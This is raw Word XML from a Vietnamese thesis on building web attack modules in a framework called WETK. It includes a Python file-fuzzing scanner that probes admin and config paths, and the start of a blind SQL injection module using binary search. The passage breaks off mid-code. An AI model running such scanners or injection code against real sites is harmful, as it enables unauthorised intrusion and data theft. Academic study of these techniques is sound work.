          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EF0EFC8" wp14:editId="3C2B9B75">
            <wp:extent cx="5969889" cy="9729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972175" cy="973294"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2BF4" w:rsidRPr="00DD2BF4" w:rsidRDefault="00DD2BF4" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc459819461"/>
      <w:r w:rsidRPr="00DD2BF4">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00DD2BF4">
        <w:t>: Hiển thị các module đã có của WETK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w:rsidR="007B258A" w:rsidRDefault="000B0F4B" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Luận văn sẽ sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> làm framework xây dựng và quản lý mã tấn công. Do đó, việc xây dựng mã tấn công sẽ tuân thủ theo các yêu cầu, định nghĩa của </w:t>
      </w:r>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Trong đó, một module phải đảm bảo có 2 phần:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0F4B" w:rsidRPr="0060415D" w:rsidRDefault="000B0F4B" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phần khởi tạo: định nghĩa các biến cần thiết, khai báo thư viện, các hàm dùng chung, cần sử dụng của WETK. Đây cũng là nơi định nghĩa các hướng dẫn cho module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0F4B" w:rsidRPr="0060415D" w:rsidRDefault="000B0F4B" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phần chạy (runner): định nghĩa module sẽ làm gì. Khi gọi vào module, hàm này sẽ được gọi sau khi khởi tạo thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF7B8A" w:rsidRPr="0060415D" w:rsidRDefault="000B0F4B" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phần tự định nghĩa của module</w:t>
      </w:r>
      <w:r w:rsidR="000A2289">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tùy chọn)</w:t>
      </w:r>
      <w:r w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: các hàm, khái niệm do module tự định nghĩa.</w:t>
      </w:r>
      <w:r w:rsidR="0060415D" w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060415D" w:rsidRDefault="0060415D" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Một module cơ bản gồm các thành phần như sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidTr="000B0F4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t>from libs.coreHTTPModule import coreHTTPModule</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t>class module(coreHTTPModule):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">    def __init__(self, logger, profile):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        coreHTTPModule.__init__(self, logger, profile)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.name = "CTF Brute Force Module"  # Changed</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.description = "This is Module for Brute force, file fuzzing"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.rank = "MEDIUM"  # Exploit level</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.type = "Scan"  # Type: exploit | scanner | support</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.author = "namhb"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.version = "0.0.1"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.fileList = [</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "robots.txt",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            ".htaccess",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "web.config",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "login.php",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "admin.php",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "phpmyadmin",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "mysqladmin",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            "backup",</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.help = "" \</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">                    "This is help for module." \</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">                    ""</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">    def sendHttpGetRequest(self, url):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        if (url[:5] == "https"):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            r = requests.get(url, verify=False)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            r.headers["content-length"] = None</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            r = requests.get(url)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        return r</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">    def run(self):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        # We coding here</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        print("Site: {0} result:".format(self.basicOptions["URL"]["currentSetting"]))</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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        print("")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        print("\t{0:50s}{1:10s}{2}".format("Filename", "Code", "Size"))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        print("\t{0:50s}{1:10s}{2}".format("--------", "----", "----"))</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t xml:space="preserve">        for fileName in self.fileList:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            r = self.sendHTTPRequest(fileName)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">            print("\t{0:50s}{1:10s}{2}".format(fileName, str(r.status_code), r.headers["content-length"]))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00851221" w:rsidRPr="00851221" w:rsidRDefault="00851221" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Đối với phương pháp truyền thống, duyệt hết các ký tự tương đối đơn giản. </w:t>
      </w:r>
      <w:r w:rsidRPr="00851221">
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cũng đã được phát triển sẵn module này nên luận văn không đi sâu vào chi tiết. Chi tiết module này (sqlinjection.blind) có thể tham khảo trong </w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mục 1 P</w:t>
      </w:r>
      <w:r>
        <w:t>hụ lụ</w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C4895">
        <w:t>của luận văn</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0F4B" w:rsidRDefault="00416450" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc459822522"/>
      <w:r>
        <w:t>Xây dựng mã tấn công sử dụng phương pháp tìm kiếm nhị phân</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w:rsidR="00416450" w:rsidRDefault="00416450" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Để xây dựng mã tấn công dạng tìm kiếm nhị phân, luận văn sẽ xây dựng các hàm sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5176" w:rsidRDefault="00BE5176" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hàm checkQuery().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5176" w:rsidRDefault="00BE5176" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F18">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A00C0" w:rsidRDefault="006A00C0" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="006A00C0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5176" w:rsidRDefault="00BE5176" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các hàm mặc định tuân thủ theo chuẩn của </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5176">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK: Hàm run() và hàm __init()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00416450" w:rsidRDefault="00416450" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Hàm checkQuery() thực hiện kiểm tra kết quả trả về là đúng hay là sai. Để xác định điều này sẽ tìm kiếm chuỗi pattern. Nếu có chuỗi này thì sẽ là True, không có là False. Giá trị chuỗi pattern được thiết lập thông qua tham số PATTER</w:t>
      </w:r>
      <w:r w:rsidR="00E644EE">
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> khi chạy </w:t>
      </w:r>
      <w:r w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK</w:t>
      </w:r>
      <w:r w:rsidR="00E644EE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, sau đó truyền vào tham số payload của hàm</w:t>
      </w:r>
      <w:r w:rsidR="00835F18">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> checkQuery()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidTr="001F7160">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:t>def checkQuery(self, payload):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t># Return true/false of query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t># If contain, return True, if not, return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t># Or use regex</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t xml:space="preserve">r </w:t>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>self.sendHTTPRequest(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>if(r.text.find(self.basicOptions["PATTERN"]["currentSetting"]) &gt; 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
